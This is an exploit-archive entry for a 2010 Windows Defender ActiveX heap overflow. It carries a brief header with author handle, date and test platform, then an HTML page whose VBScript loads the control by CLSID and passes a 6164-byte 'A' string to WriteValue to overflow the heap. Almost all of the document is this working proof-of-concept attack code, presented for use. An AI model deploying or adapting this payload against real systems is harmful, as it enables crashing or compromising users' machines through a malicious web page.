Microsoft Windows Defender Active-X heap overflow proof of concept exploit. Version 2 of this exploit.
417678d83da68079f21ccf2b6eec2685f677ead666201a5756a283e0aacadcd4
#Aouther : [SarBoT511]
#Exploits title :[Microsoft Windows Defender ActiveX Heap Overflow PoC]
#downloads :[www.microsoft.com]
#Date : [2010/01/19]
#tested on :[windows 7]
#Microsoft Windows Defender
<html>
<object classid='clsid:07DD3249-A591-4949-8F20-09CD347C69DC' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Windows Defender\MsMpCom.dll"
prototype = "Sub WriteValue ( ByVal bstrKeyName As String , ByVal bstrValueName As String , ByVal eType As _MP_COM_CONFIG_TYPE , ByVal varValue As Variant )"
memberName = "WriteValue"
progid = "MpComExportsLib.MsMpSimpleConfig"
argCount = 4
arg1=String(6164, "A")
arg2="defaultV"
arg3=1
arg4="defaultV"
target.WriteValue arg1 ,arg2 ,arg3 ,arg4
</script>